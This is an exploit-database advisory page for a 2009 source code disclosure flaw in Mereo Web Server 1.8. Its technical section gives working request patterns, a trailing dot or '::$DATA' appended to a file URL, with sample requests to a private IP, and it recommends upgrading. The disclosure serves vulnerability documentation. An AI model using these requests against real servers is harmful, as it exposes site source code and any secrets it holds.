header-logo
Suggest Exploit
vendor:
Mereo Web Server
by:
Dr_IDE
9.3
CVSS
HIGH
Remote Source Code Disclosure
200
CWE
Product Name: Mereo Web Server
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:mereo:mereo_web_server:1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Mereo Web Server v1.8 Multiple Remote Source Code Disclosure

Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of the application available. Mereo is vulnerable to remote arbitrary source code disclosure by the following means. http://[ webserver IP]/[ file ][.] http://[ webserver IP]/[ file ][::$DATA]

Mitigation:

Upgrade to the latest version of Mereo Web Server.
Source

Exploit-DB raw data:

#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################

- Description -

Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
the application available. 

Mereo is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][.]
	http://[ webserver IP]/[ file ][::$DATA]
	
	http://172.16.2.101/index.html.
	http://172.16.2.101/index.html::$DATA

Navigation

Suggest Exploit

Services By CQR